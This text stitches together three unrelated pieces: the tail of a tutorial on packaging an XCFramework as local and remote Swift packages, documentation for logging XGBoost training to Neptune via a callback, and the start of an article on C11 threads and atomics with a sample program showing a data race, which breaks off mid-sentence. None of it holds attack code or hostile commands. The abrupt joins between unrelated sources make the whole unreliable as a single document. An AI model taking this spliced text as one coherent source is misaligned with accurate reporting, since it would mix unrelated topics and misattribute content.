a local path, and that usually is the preferred approach while still being in the development stage. In that case things are a bit different; the binary framework must be included in the package, on top of any configuration required to be done in the package’s manifest file. A Local Swift Package We’ll start from the second case that was just described above, and we’ll see how to configure a Swift package that uses the binary framework from a local path. Before creating the package though, let’s begin from a different point; let’s make a copy of the XIBLoadable.xcframework first. Although not mandatory, we’ll do it deliberately here for one simple reason; to keep the original instance of the binary framework in the output folder. By adding the framework to the package right next, the entire framework folder will move to the package’s folder and will no longer exist under its current location. However, I’d like us to have it in the output folder as well, because we’ll need it again in order to demonstrate the steps for creating a remote Swift package and framework. So, back in Terminal make sure that you’re still in the output folder. Then type the following command to create a copy of the XIBLoadable.xcframework folder: We’re duplicating the XIBLoadable framework and we’re temporarily give it the XIBLoadablePackage.xcframework name. We’ll rename it properly when we’ll add that to the Swift package next. Let’s return to Xcode. Go to the File > New > Swift Package… menu to initiate the creation of a brand new Swift package, and name it XIBLoadableLocal. You are strongly advised to store it in the same subfolder where you have the output folder, as well as both XIBLoadable-iOS and XIBLoadable-macOS framework projects. This will help a lot to work with paths in Terminal later. Once it’s ready, and before we add the binary framework to it, we can delete almost all files created by default; we don’t need them, but it’s okay even if you leave them untouched. I choose to delete them here so we have a clean package, so select the Tests folder and delete it entirely. Then, delete the XIBLoadableLocal folder under Sources, and let Sources be the only folder you are seeing in the package. After that, drag and drop the XIBLoadablePackage.xcframework from the output folder in Finder under the Sources folder in Xcode. Then rename it to its original name, XIBLoadable.xcframework. Now open the Package.swift file; the package’s manifest file where we’ll specify the binary framework as a target. At first, go to the targets array, and delete all the default content you’ll find there. Then add the following: See that the path to the XCFramework is in relation to the root path of the package. Besides that, it’s also necessary to update the targets argument in the library(name:targets:) method right above, and provide the XIBLoadable as the target name for the library that the package will produce. Here’s how the entire Package.swift file should look like: Testing The Swift Package With The Local Binary Framework Open the LoadableViewDemo-iOS project in Xcode, and at the same time close the XIBLoadableLocal Swift package. Select the project name in the Project navigator, go to the General tab, under the Frameworks, Libraries, and Embedded Content section select the XIBLoadable.xcframework framework and then click to the minus button to remove it. In addition, delete the XIBLoadable.xcframework item from the Project navigator, under the Frameworks group. When asked, click on the Remove Reference button so the binary framework won’t be deleted from its original location. Once you do all that, place Finder and Xcode one next to another, and drag and drop the XIBLoadableLocal package folder onto the Project navigator. Then, in the General tab again press the plus button in the Frameworks, Libraries, and Embedded Content section, and in the sheet that appears choose to add the XIBLoadable library. Without making any other change, either build the project to ensure that no errors exist, or run it straight either in the Simulator or on a device. If everything runs as before, then congratulations, you just managed to use the local Swift package as a dependency with the binary framework embedded in it, instead of having the framework added to the project alone. Feel free to follow the same steps as above and use the Swift package in the LoadableViewDemo-macOS project as well. Remote Swift Package With Remote Binary Framework As I’ve already said, the Swift package and the binary framework don’t have to exist in the same remote location when they’re not meant to exist locally. XCFramework can be hosted on a server, and the Swift package to exist in a remote repository. Let’s see that case, so let’s work our way towards that direction. After all the necessary configuration to the Swift package is made, we’ll upload it in a private repository on GitHub so we can add it as a remote dependency later. The binary framework will also be uploaded to a remote server. The recommended choice is your own personal or company server, but for testing purposes you can even store it to a local server, if you’re running one. There’s a particularity we have to watch out for here. The remote server should not contain the framework’s folder as is, but compressed as a zip file. Actually, and in order to avoid encountering any errors in Xcode later on, don’t use cloud services that they don’t return a share link with the zip extension at the end of the URL. That’s why a custom server is usually the best approach. Having said that, bring Terminal in front, and supposing that you’re still in the output folder type the following command to compress the XIBLoadable.xcframework folder into a zip archive: The XIBLoadable.xcframework.zip file should be listed along with everything else in the output folder now. Let’s create a new Swift package now which we’ll call XIBLoadableRemote. Since we’ve already done that in the previous part, please follow all steps described there, including the default files clean up as well as deleting the predefined targets in the Package.swift file, and updating the library(name:targets:) parameter values with the XIBLoadable value. In the targets array now we’ll add another method called binaryTarget(name:url:cheksum). There are three parameter values we have to provide here: - The name of the framework. This will be the same as before, XIBLoadable. - The URL to the remote framework zip file. - The checksum of the framework zip file. Using it, Xcode will be in a position to verify the downloaded framework’s archived file. To calculate the checksum, go one last time to Terminal and first change the working directory to the root folder of the Swift package (that’s why I advised you earlier to save Swift package along with output and the other folders, so as to make it easy here): Then, type in the following command to generate the checksum of the zip file. Note that we provide the relative path to it: A few moments later you will see checksum showing up on Terminal. It’ll be something like that: 8580a0031a90739830a613767150ab1a53644f6e745d6d16090429fbc0d7e7a4 Now it’s a good time to upload the XIBLoadable.xcframework.zip file to the server. Do that and come back to keep reading. Don’t forget to have the URL to the remote location of the archived framework handy when come back. Having at this point the remote URL and the checksum available, let’s head back to Xcode in order to specify what the remote binary target is. This time we’ll use the binaryTarget(name:url:checksum) method in the targets array: As a reminder, make sure that the above URL ends with the zip extension, otherwise you’ll encounter errors in Xcode. The new Swift package has been configured, so now we’ll push it to a remote, private repository on GitHub. To continue, it’s necessary to have a GitHub account, or alternatively, a Bitbucket account to use instead. The detailed steps to do that task in Xcode have been thoroughly described in this tutorial, even though Xcode 12 introduces some changes to the naming of certain functionalities. Regardless, the overall process remains the same, and here I’m going to present them really shortly. So, let’s walk through these steps. At first, go to Source Control > New Git Repositories… menu in Xcode. In the window that shows up make sure that the XIBLoadableRemote package is selected and click Create. This action creates a local repository and commits the package. Then, to create the remote repository: - Open the Source Control navigator (Cmd+2). - Right click on the XIBLoadableRemote repository to show the context menu. - Select the New “XIBLoadableRemote” Remote… menu option. - In the new window that appears, either select an existing GitHub account or create one. Also, select the Private radio button to keep it private. Leave the repository name as is and click Create. To push the package version in the remote repository: - In the Source Control navigator again right click on the XIBLoadableRemote repository to show the context menu. - Select the Tag “main”… option. - In the next window set the version number; 1.0.0 here is okay. No need to type a message so click Create. - Open the Source Control > Push… main menu in Xcode. - Check the Include tags checkbox and click Push. The Swift package now exists remotely on GitHub (or any other service you might be using), so we can finally test whether it’s working properly or not. Testing The Remote Swift Package While being in Xcode, close the XIBLoadableRemote package and open the LoadableViewDemo-iOS project. If you still have the XIBLoadableLocal package added to the project, then simply right click on it in the Project navigator and choose the delete option. However, in the confirmation alert, make sure to click on the Remove Reference button, so the Swift package won’t be deleted from the disk too. Next, let’s add the remote package we configured right above as a dependency to the project. Go to the File > Swift Packages > Add Package Dependency… menu option, and either choose the new package repository if it’s automatically listed there, or just type the URL to it so it’s fetched. Continue to the next steps until the overall process is finished, just make sure that the XIBLoadable package product is selected in the last step. In the end, you’ll see that a new section named Swift Package Dependencies is showing up in Project navigator. In it you’ll see the XIBLoadableRemote Swift package that contains the XIBLoadable binary framework under a special group called Referenced Binaries. At this point we’re all set, and we can run the app once again to make sure that it’s working. In case you get any error messages, make sure that the XIBLoadable protocol is listed under the Frameworks, Libraries, and Embedded Content section in the General tab of the target settings. Otherwise, go through all presented steps above and ensure that you haven’t skipped any. Conclusion Getting to the end of this post, there’s a confession I’d like to make; this is one of the tutorials that I enjoyed writing the most, as it’s about stuff that’s not only interesting, but also quite useful. If you ever tried to create a binary framework that was supposed to be working in both iOS devices and the Simulator, then you can definitely appreciate the significance of the XCFramework format. But even if you did not, you can still recognise how important the ability to bundle up framework variants in one single place is, and eventually use and distribute just that. And if you’re a Swift package fan like I am, then you have all the reasons to feel happy with the marriage of XCFrameworks and Swift packages, regardless of whether you’re sharing code with others or you’re creating your own, personal library of reusable components. I really hope you found this post helpful, and that there’s something new you learnt here today. And with that I leave you, so, take care! For reference, you can download the full project on GitHub.
https://www.appcoda.com/xcframework/
CC-MAIN-2021-17
refinedweb
5,935
58.52
. PathCharacter. RowsXCols). Queue Origin: iCurrent iLeft=iCurrent-1; // get node no of the left node But we have to make sure that this node no. is valid. For this, we have to check: iLeft Ready Waiting. FindPath(). Version 1.0 Version 1.1 Version 1.2. int GetNodeNo(int matrix, int ithIndex, int jthIndex) { return ( ithIndex*matrix.GetLength(1)+ jthIndex ); } int GetNodeNo(int[,] matrix, int ithIndex, int jthIndex) { return ( ithIndex*matrix.GetLength(1)+ jthIndex ); } General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/9040/Maze-Solver-shortest-path-finder?msg=1040735
CC-MAIN-2016-36
refinedweb
104
59.3
Microsoft at one of their international locations asks these questions. 1. What is an interface and what is an abstract class? Please, expand by examples of using both. Explain why. 2. What is serialization, how it works in .NET? 3. What should one do to make class serializable? 4. What exactly is being serialized when you perform serialization? 5. Tell me about 6h4 methods you have used to perform serialization. 6. Did you work with XML and XSL Transformations? 7. What methods and what for did you use to work with XML? 8. What is the purpose of reserved word “using” in C#? 9. How does output caching work in ASP.NET? 10. What is connection pooling and how do you make your application use it? 11. What are different methods of session maintenance in ASP.NET? 12. What is Viewstate? 13. Can any object be stored in a Viewstate? 14. What should you do to store an object in a Viewstate? 15. Explain how Viewstate is being formed and how it’s stored on client. 16. Explain control life cycle, mind event order. 17. What do you know about ADO.NET’s objects and methods? 18. Explain DataSet.AcceptChanges and DataAdapter.Update methods. 19. Assume you want to update a record in the database using ADO.NET. What necessary steps you should perform to accomplish this? 20. How to retreive the value of last identity has been updated in a database (SQL Server)? Answers : 1. Answers: 1). 2. 1)what is the use of Web.configure in ASP.net,Give one example 2)please tell me how to code fo updating & downloading the file,Give one example code 1 Microsoft interview question 2 3. This link might help to solve 2nd and 3rd question 9). 4. Question 1: What is an interface and what is an abstract class? Please, expand by examples of using both. Explain why. Answer. 5. Hi, I want to know that how can we conver a report file into a Acrobat(PDF file), or Word file for transport purpose over the internet. 2 Microsoft interview question 3 Please go through the following link as well;EN-US;q169470 7. what is the difference between the comple time and runteime 8. Abstract vs Interface. All abstract methods are virtual by default. They have to be overriden. Interface methods are not virtual by default. When you are implementing an interface method you can decide whether you want it to be virtual or not. 9.? To make a class serializable is to mark it with the Serializable attribute as follows. [Serializable] public class MyObject { public int n1 = 0; public int n2 = 0; 3 Microsoft interview question 4 public String str = null; } What exactly is being serialized when you perform serialization? The object’s state (values). 4 Microsoft interview question 5 DataSet.AcceptChanges method Commits all the changes made to this row since the last time AcceptChanges was called. Tech Interviews comment by Akantos 10. WILL U PLS TELL ME ALL OBJECTS IN ASP.NET URGENT Tech Interviews comment by Gyan 11. Question 1: in C# you can’t multiple inheritence so you have to use interfaces to accomplish it. 12. Can anyone tell me that which language to use(VB.NET OR C# ) when all languages are equal in .NET world? 13. Hi Harshad, Regarding your question about which language to use. According to me you can go ahead with any language, both C# and vb.net are same in functionality ( though they have differences also but which are not so important and what i think we need not be worried about it). Following are few differences between c# and vb.net (as mentioned in MSDN): Case sensitivity Variable declaration and assignment Data types Statement termination Statement blocks Use of () vs. [] Operators Conditional statements Error handling Overflow checking Parameter passing Late binding Handling unmanaged code Keywords What i feel is it all depends on the project’s requirement which to use. In one company i was using only C# and in another only vb.net. One more thing many of 5 Microsoft interview question 6 our friends will have different opinion about it, so lets wait for their replies.This is what i can tell you. Regards Manish Tech Interviews comment by manish 14. Hi gyan, Every thing in .Net is an object. If you can be more exact i think more people can help you. 15. One more question which troubles me a lot that reflection is used by the framework transparently but when do we have to use it? 16. I am using a Mozilla Fire fox browser. I found few things listed are not working. Can anyone give me a solution? 1. When the asp:panel is used in the aspx Page firefox browser doesn’t support instead the layout is getting distorted. Can any one suggest a solution? 2. When the onMouseout of javascript do not work. 3. Many properties of the IE browser seems not working in Mozilla. Tech Interviews comment by Chandini 17. i never used smart navigation in my pages .I just gone through the comments before using that, now i am not enough dare to use that in my application pages. Tech Interviews comment by ManojNair 18. Q. If base class is abstract class and derived class inherits the base class and derives class has it own function which is not abstract so how we use the derived class functions. Actually does not instantiated Tech Interviews comment by rajesh 19. ViewState is the mechanism by which page information is maintained between the post backs. Object can be stored in viewstate as long as the object is serializable. you can store string, arraylist etc in Viewstate. 6 Microsoft interview question 7 20. Viewstate is stored in the hidden field __VIEWSTATE. we can disable the viewstate in application, page, control levels. 21. @@IDENTITY is used to retrieve the the last-inserted identity value in Sql Server. 22. Downloading and uploading For downloading a file, use a hyperlink and specify the URL of the file as the link. For uploading a file, use the File Field control, from the HTML controls, to select the file. Change it to run at server and use the upload or save(or something similar) method associated with it. Tech Interviews comment by Thomas 23. How to pass datatable as a parameter to a stored procedure in oracle.Kindly let me know and is an urgent requirement 24. What is the purpose of reserved word “using” in C#? A keyword that specifies that types in a particular namespace can be referred to without requiring their full qualified type names. 25. What is Passport security? and how it works? 26. .What is the use of reflections class in .NET? 2.Root class in .NET? 27. How to handle date problem if application server and database server has diffirent date format? DateTime FromDate=new DateTime(2000,1,1); DateTime ToDate=DateTime.Now; _whereClause=”"; string _frmdate=FromDate.Year.ToString()+FromDate.Month.ToString()+FromDate.Da y.ToString(); 7 Microsoft interview question 8 string _todate=ToDate.Year.ToString()+ToDate.Month.ToString()+(ToDate.Day+1).ToSt ring(); _whereClause=_whereClause + ” and ” + “createDate between cast(’” + _frmdate + “‘ as DateTime) and cast(’” + _todate + “‘ as DateTime)”; 8
https://www.scribd.com/document/72857/NetQuestions
CC-MAIN-2019-09
refinedweb
1,208
68.26
Hi Guys, Welcome to Proto Coders Point, In this Flutter Tutorial we will Learn how to implement Google Authentication with your flutter Apps using Firebase Services. What you’ll learn? – Login with Google – Firebase Configuration – Fetching user’s profile DEMO Flutter Firebase Google SignIn | Flutter Login with Google Firebase First of all, OffCourse you need to create a Flutter project, I use Android Studio as my IDE to Create my Flutter application, Hope you guys have Create your project on your respective IDE’s Now Go to Firebase console and Setup your project to make use of Google Sign In service of Fireabase Set-Up to be made on Firebase Console Step 1 : Go to Firebase Console Step 2 : Create new Project and Add Project as Android Then, In you firebase console you need to create a new Firebase project or Open any Existing project, you can create the project as shown in below screenshots. Then you while get new window to add app like in android,iOS, unity and web app check out the below screenshot to add new app. In this tutorial we will just add app for android platform Step 3 : Add Firebase to your android Project How to get Package name for Android Flutter? How to Generate SHA-1 certificate for Firebase Console? here is an tutorial article to generate SHA-1 certificate Step 4 : Download the Config file (google-services.json) Then once you app the package name and SHA-1 cerficate in firebase project, it will give you a json file called google-services.json that you need to add flutter project in your android package section as show below. Step 5 : Go to Authentication option and Enable Google SignIn providers In the last step, go to authentiation section on the left side of your firebase console and you need to Enable Google SignIn Provider Option to be able to login in with Google Services using Firebase. Ok then, Now we are done with Server side that is, connecting our flutter project to firebase console. Now let’s come to Coding part Flutter Firebase Google Sign In Step 1 : Add GoogleSignIn dependencies A Flutter google sign in plugin for Google Sign In. Note: This plugin is still under development, and some APIs might not be available yet. Feedback and Pull Requests are most welcome! In your Flutter Project, open pubspec.yaml file and add the Google Sign In Dependencies in it. dependencies: google_sign_in: #add this line. Step 2 : Import google sign in dart class import 'package:google_sign_in/google_sign_in.dart'; Step 3 : Create a Instance of Google Sign In GoogleSignIn googleSignIn = GoogleSignIn(scopes: ['email']); then in your main dart class file you need to create a new Instance object and give it a scope of “Email”, by giving scope as “email” this will open only email signin method. Step 4 : Login Method Now you need to perform a login method by with one can click on a button that will call a _login() method and googlesignin.signIn() will run. googleSignIn.signIn(); just you need to use this google instance object and call sign in method. Complete Code is given below. Step 5 : Logout Method If user is been signed in and need to logout/signout you need to call a method by with user can be able to signout himself. googleSignIn.signOut(); just you need to use this google instance object and call sign out method. Complete Code is given below. Complete Code for Flutter Google Sign In main.dart import 'package:flutter/cupertino.dart'; import 'package:flutter/material.dart'; import 'package:google_sign_in/google_sign_in: MyHomePage(), ); } } class MyHomePage extends StatefulWidget { @override _MyHomePageState createState() => _MyHomePageState(); } class _MyHomePageState extends State<MyHomePage> { bool isLoggedIN = false; GoogleSignIn googleSignIn = GoogleSignIn(scopes: ['email']); _login() async{ print("Google Sign"); try{ await googleSignIn.signIn(); setState(() { isLoggedIN = true; }); }catch(err){ print("Google Sign In Failed"); } } _logout() async{ print("Google Sign"); try{ await googleSignIn.signOut(); setState(() { isLoggedIN =false; }); }catch(err){ print("Google Sign In Failed"); } } @override Widget build(BuildContext context) { return Scaffold( appBar: AppBar( title: Text("Google Login "), ), body: Container(), bottomNavigationBar: Center( child: Column( mainAxisAlignment: MainAxisAlignment.center, children: <Widget>[ isLoggedIN ? Column( children: <Widget>[ Image.network(googleSignIn.currentUser.photoUrl,width: 200,height: 200), Text("Name : ${googleSignIn.currentUser.displayName}"), RaisedButton( child: Text("Log-Out"), onPressed: (){ _logout(); }, ), ], ):RaisedButton( child: Text("Sign In With Google"), onPressed: (){ _login(); }, ), ], ), ), ); } } Conclusion In this Flutter Tutorial we have demonatrated you with, How to use Firebase Console to create a Google Sign in flutter application.
https://protocoderspoint.com/flutter-firebase-google-signin/
CC-MAIN-2021-21
refinedweb
740
60.65
fmin, fminf, fminl − determine minimum of two floating-point numbers #include <math.h> double fmin(double x, double y); float fminf(float x, float y); long double fminl(long double x, long double y); Link with −lm. Feature Test Macro Requirements for glibc (see feature_test_macros(7)): fmin(), fminf(), fminl(): _XOPEN_SOURCE >= 600 || _ISOC99_SOURCE || _POSIX_C_SOURCE >= 200112L; or cc -std=c99 These functions the lesser value of x and y. These functions return the minimum. fmax(3) This page is part of release 3.53 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at−pages/.
http://man.linuxtool.net/centos7/u3/man/3_fminf.html
CC-MAIN-2019-35
refinedweb
103
66.64
cc [ flag ... ] file ...-lnvpair [ library ... ] #include <libnvpair.h> These functions find the nvpair (name-value pair) that matches the name and type as indicated by the interface name. If one is found, nelem and val are modified to contain the number of elements in value and the starting address of data, respectively. These functions work for nvlists (lists of name-value pairs) allocated with NV_UNIQUE_NAME or NV_UNIQUE_NAME_TYPE specified in nvlist_alloc(). (See nv_list_alloc(3nvpair).) If this is not the case, the function returns ENOTSUP because the list potentially contains multiple nvpairs with the same name and type. All memory required for storing the array elements, including string value, are managed by the library. References to such data remain valid until nvlist_free() is called on nvl. Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error. These functions will fail if: See attributes(5) for descriptions of the following attributes: libnvpair(3NVPAIR), attributes(5)
http://www.shrubbery.net/solaris9ab/SUNWaman/hman3nvpair/nvlist_lookup_boolean.3nvpair.html
CC-MAIN-2015-22
refinedweb
160
54.22
[Guido] > I seem to have trouble explaining what I meant. I know, and I confess I'm giving you a hard time. There's a point to that too: uniqueness also imposes costs on newbies and/or newcomers. Across the world of programming languages now, dynamic scoping and lexical scoping are "almost entirely *it*". For example, the Perl spelling of the running example here does work the way you intend, but the explanation in Perl is full-blown dynamic scoping: sub g { print "$x\n"; # prints 12 -- "full-blown dynamic scoping" } sub f { print "$x\n"; # prints 10 local($x) = 12; &g(); } $x = 10; &f(); print "$x\n"; # prints 10 Once you make f print 10, you're on that path as far as anyone coming from any other language can tell at first glance (or even second and third). If you go on to make g print 10 too, it's inexplicable via reference to how any other language works. If there were a huge payback for "being different" here, cool, but the only real payback I see is letting newbies avoid learning how lexical scoping works, and only for a little while. > Long ago, before I introduced LOAD_FAST and friends, Python had > something that for want of a better term I'll call "lexical scoping > with dynamic lookup". I'm old enough to remember this <wink>. > It did a dynamic lookup in a (max 3 deep: local / global / builtin) > stack of namespaces, but the set of namespaces was determined by the > compiler. This does not have the problems of dynamic scoping (the > caller's stack frame can't cause trouble). But it also doesn't have > the problem of the current strict static scoping. Nor its advantages, including better error detection, and ease of transferring hard-won knowledge among other lexically scoped languages. > I like the older model better than the current model (apart from > nested scopes) and I believe that the "only runtime" rule explains why > the old model is more attractive: it doesn't require you to think of > the compiler scanning all the code of your function looking for > definitions of names. You can think of the interpreter pretty much > executing code as it sees it. You have to have a model for name > lookup that requires a chaining of namespaces based on where a > function is defined, but that's all still purely runtime (it involves > executing the def statement). > > This requires some sophistication for a newbie to understand, but it's > been explained successfully for years, and the explanation would be > easier without UnboundLocalError. > > Note that it explains your example above completely: the namespace > where f is defined contains a definition of x when f is called, and > thus the search stops there. Does it scale? x = 0 def f(i): if i & 4: x = 10 def g(i): if i & 2: x = 20 def h(i): if i & 1: x = 30 print x h(i) g(i) f(3) I can look at that today and predict with confidence that h() will either print 30 (if and only if i is odd), or raise an exception. This is from purely local analysis of h's body -- it doesn't matter that it's nested, and it's irrelvant what the enclosing functions look like or do. That's a great aid to writing correct code. If the value of x h sees *may* come from h, or from g, or from f, or from the module scope instead, depending on i's specific value at the time f is called, there's a lot more to think about. I could keep local+global straight in pre-1.0 Python, although I never got used to the inability to write nested functions that could refer to each other (perhaps you've forgotten how many times you had to explain that one, and how difficult it was to get across?). Now that Python has full-blown nested scopes, the namespace interactions are potentially much more convoluted, and the "purely local analysis" shortcut made possible by everyone else's <wink> notion of lexical scoping becomes correspondingly more valuable. > ... > Um, that's not what I'd call dynamic scoping. It's dynamic lookup. I know -- the problem is that you're the only one in the world making this distinction, and that makes it hard to maintain over time. If it had some killer advantage ... but it doesn't seem to. When Python switched to "strict local" names before 1.0, I don't recall anyone complaining -- if there was a real advantage to dynamic lookup at the local scope, it appeared to have escaped Python's users <wink>. I'll grant that it did make exec and "import *" more predictable in corner cases. > It's trouble for a compiler that wants to optimize builtins, but the > semantic model is nice and simple and easy to explain with the "only > runtime" rule. Dynamic scoping is also easy to explain, but it doesn't scale. I'm afraid dynamic lookup doesn't scale either. You should have stuck with Python's original two-level namespace, you know <0.9 wink>. the-builtins-didn't-count-ly y'rs - tim
https://mail.python.org/pipermail/python-dev/2002-April/023442.html
CC-MAIN-2019-39
refinedweb
872
67.28
Neptune-XGBoost Integration¶ What will you get with this integration?¶ XGBoost is an optimized distributed gradient boosting library designed to be highly efficient, flexible and portable. The integration with Neptune lets you log multiple training artifacts with no further customization. The integration is implemented as XGBoost callback and provides the following capabilities: Log metrics (train and eval) after each boosting iteration. Log model (Booster) to Neptune after the last boosting iteration. Log feature importance to Neptune as an image after the last boosting iteration. Log visualized trees to Neptune as images after the last boosting iteration. Note This integration is tested with xgboost==1.2.0, and neptune-client==0.4.132. Where to start?¶ To get started with this integration, follow the Quickstart below. If you want to try things out and focus only on the code you can either: Quickstart¶ This quickstart will show you how to log XGBoost experiments to Neptune using XGBoost-Neptune integration. Integration is implemented as XGBoost callback and made available in the neptune-contrib library. As a result you will have an experiment logged to Neptune with metrics, model, feature importances and (optionally, requires graphviz) visualized trees. Have a look at this example experiment. Before you start¶ You have Python 3.x and following libraries installed: neptune-client: See neptune-client installation guide. neptune-contrib[monitoring]: See neptune-contrib installation guide. xgboost==1.2.0. See XGBoost installation guide. pandas==1.0.5and scikit-learn==0.23.1. See pandas installation guide and scikit-learn installation guide. Example¶ Make sure you have created an experiment before you start XGBoost training. Use the create_experiment() method to do this. Here is how to use the Neptune-XGBoost integration: import neptune ... # here you import `neptune_callback` that does the magic (the open source magic :) from neptunecontrib.monitoring.xgboost import neptune_callback ... # Use neptune callback neptune.create_experiment(name='xgb', tags=['train'], params=params) xgb.train(params, dtrain, num_round, watchlist, callbacks=[neptune_callback()]) # neptune_callback is here Logged metrics¶ These are logged for train and eval (or whatever you defined in the watchlist) after each boosting iteration. Logged model¶ The model (Booster) is logged to Neptune after the last boosting iteration. If you run cross-validation, you get a model for each fold. Logged feature importance¶ This is a very useful chart, as it shows feature importance. It is logged to Neptune as an image after the last boosting iteration. If you run cross-validation, you get a feature importance chart for each fold’s model. Logged visualized trees (requires graphviz)¶ Note You need to install graphviz and graphviz Python interface for log_tree feature to work. Check Graphviz and Graphviz Python interface for installation info. Log first 6 trees at the end of training (tree with indices 0, 1, 2, 3, 4, 5) xgb.train(params, dtrain, num_round, watchlist, callbacks=[neptune_callback(log_tree=[0,1,2,3,4,5])]) Selected trees are logged to Neptune as an image after the last boosting iteration. If you run cross-validation, you get a tree visualization for each fold’s model, independently. Explore Results¶ You just learned how to start logging XGBoost experiments to Neptune. Check this experiment or view quickstart code as a plain Python script on GitHub. Common problems¶ If you are using Windows machine with Python 3.8 and xgboost-1.2.1, you may encounter tkinter error when logging feature importance. This problem does not occur on the Windows machine with Python 3.8 and xgboost-1.2.0. Also, it does not occur on the Windows machine with Python 3.6 or Python 3.7. How to ask for help?¶ Please visit the Getting help page. Everything regarding support is there.
https://docs-legacy.neptune.ai/integrations/xgboost.html
CC-MAIN-2021-17
refinedweb
610
51.95
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4) #include <rtl.h> BOOL tcp_close ( U8 socket ); /* TCP socket to close. */ The tcp_close function initiates the procedure to close the TCP connection. It might take some time to close the connection. The argument socket specifies the handle of the socket whose connection is to be closed. TCPnet calls the listener callback function only, when a remote peer has closed the connection. If the socket closing is initiated locally by calling tcp_close, the callback function is not called. When a socket type is TCP_TYPE_SERVER or TCP_TYPE_CLIENT_SERVER, the socket does not close after calling tcp_close. The active connection is closed, and the socket transits to TCP_STATE_LISTEN. In this state, the socket is still able to accept incoming connections. To close the TCP_TYPE_SERVER socket, the function tcp_close needs to be called twice. The tcp_close function is in the RL-TCPnet library. The prototype is defined in rtl.h. note The tcp_close function returns __TRUE if the connection closing procedure has been started successfully. Otherwise, the function returns __FALSE. tcp_abort, tcp_release_socket #include <rtl.h> void disconnect_tcp (U8 tcp_soc) { .. /* This TCP connection is no longer needed */ tcp_close (tcp_soc); /* Release TCP Socket in a polling function */ } void poll_socket (U8 tcp_soc) { int state; state = tcp_get_state (tcp_soc); if (state > TCP_STATE_LISTEN) { /* Closing procedure is on-going */ return; } if (state == TCP_STATE_LISTEN) [ /* Socket has TCP_TYPE_SERVER attribute */ /* needs additional close request. */ tcp_close (tcp_soc); } /* A socket is in TCP_STATE_CLOSED state now. */ tcp_release_socket (tcp.
https://www.keil.com/support/man/docs/rlarm/rlarm_tcp_close.htm
CC-MAIN-2020-34
refinedweb
242
50.53
The committee that standardizes the C programming language (ISO/IEC JTC1/SC22/WG14) has completed a major revision of the C standard. The previous version of the standard, completed in 1999, was colloquially known as "C99." As one might expect, the new revision completed at the very end of last year is known as "C11." In this article and its companion article, I will describe the major new features of C11 in concurrency, security, and ease of use. A final article will discuss compatibility between C11 and C++. Concurrency C11 standardizes the semantics of multithreaded programs, potentially running on multicore platforms, and lightweight inter-thread communication using atomic variables. The header <threads.h> provides macros, types, and functions to support multi-threading. Here is a summary of the macros, types, and enumeration constants: - Macros: thread_local, ONCE_FLAG, TSS_DTOR_ITERATIONS cnd_t, thrd_t, tss_t, mtx_t, tss_dtor_t, thrd_start_t, once_flag. - Enumeration constants to pass to: mtx_init: mtx_plain, mtx_recursive, mtx_timed. - Enumeration constants for threads: thrd_timedout, thrd_success, thrd_busy, thrd_error, thrd_nomem. - Functions for condition variables: call_once(once_flag *flag, void (*func)(void)); cnd_broadcast(cnd_t *cond); cnd_destroy(cnd_t *cond); cnd_init(cnd_t *cond); cnd_signal(cnd_t *cond); cnd_timedwait(cnd_t *restrict cond, mtx_t *restrict mtx, const struct timespec *restrict ts); cnd_wait(cnd_t *cond, mtx_t *mtx); - The mutexfunctions: void mtx_destroy(mtx_t *mtx); int mtx_init(mtx_t *mtx, int type); int mtx_lock(mtx_t *mtx); int mtx_timedlock(mtx_t *restrict mtx, const struct timespec *restrict ts); int mtx_trylock(mtx_t *mtx); int mtx_unlock(mtx_t *mtx); - Thread functions: int thrd_create(thrd_t *thr, thrd_start_t func, void *arg); thrd_t thrd_current(void); int thrd_detach(thrd_t thr); int thrd_equal(thrd_t thr0, thrd_t thr1); noreturn void thrd_exit(int res); int thrd_join(thrd_t thr, int *res); int thrd_sleep(const struct timespec *duration, struct timespec *remaining); void thrd_yield(void); - Thread-specific storage functions: int tss_create(tss_t *key, tss_dtor_t dtor); void tss_delete(tss_t key); void *tss_get(tss_t key); int tss_set(tss_t key, void *val); These standardized library functions are more likely to be used as a foundation for easier-to-use APIs than as a platform for building applications. (See "When Tasks Replace Objects," by Andrew Binstock, for discussion of higher-level APIs.) For example, when using these low-level library functions it is very easy to create a data race, in which two or more threads write (or write-and-read) to the same location without synchronization. The C (and C++) standards permit any behavior if a data race happens to some variable x, which can lead to serious trouble. For example, some bytes of the value of x might be set by one thread and other bytes could be set by another thread ("torn values"), or some side-effect that appears to take place after assignment to x might (to another thread or another processor) appear to take place before that assignment. Here is a short program that contains an obvious data race, where the 64-bit integer ( long long) named x is written and read by two threads: #include <threads.h> #include <stdio.h> #define N 100000 char buf1[N][99]={0}, buf2[N][99]={0}; long long old1, old2, limit=N; long long x = 0; static void do1() { long long o1, o2, n1; for (long long i1 = 1; i1 < limit; ++i1) { old1 = x, x = i1; o1 = old1; o2 = old2; if (o1 > 0) { // x was set by this thread if (o1 != i1-1) sprintf(buf1[i1], "thread 1: o1=%7lld, i1=%7lld, o2=%7lld", o1, i1, o2); } else { // x was set by the other thread n1 = x, x = i1; if (n1 < 0 && n1 > o1) sprintf(buf1[i1], "thread 1: o1=%7lld, i1=%7lld, n1=%7lld", o1, i1, n1); } } } static void do2() { long long o1, o2, n2; for (long long i2 = -1; i2 > -limit; --i2) { old2 = x, x = i2; o1 = old1; o2 = old2; if (o2 < 0) { // x was set by this thread if (o2 != i2+1) sprintf(buf2[-i2], "thread 2: o2=%7lld, i2=%7lld, o1=%7lld", o2, i2, o1); } else { // x was set by the other thread n2 = x, x = i2; if (n2 > 0 && n2 < o2) sprintf(buf2[-i2], "thread 2: o2=%7lld, i2=%7lld, n2=%7lld", o2, i2, n2); } } } int main(int argc, char *argv[]) { thrd_t thr1; thrd_t thr2; thrd_create(&thr1, do1, 0); thrd_create(&thr2, do2, 0); thrd_join(&thr2, 0); thrd_join(&thr1, 0); for (long long i = 0; i < limit; ++i) { if (buf1[i][0] != '\0') printf("%s\n", buf1[i]); if (buf2[i][0] != '\0') printf("%s\n", buf2[i]); } return 0; } If you had an implementation that already conformed to the C11 standard, and you compiled this program for a 32-bit machine (so that a 64-bit long long is written in two or more memory cycles), you could expect to see confirmation of the data race, with a varying number of lines of output such as this: thread 2: o2=-4294947504, i2= -21, o1= 19792 The traditional solution for data races has been to create a 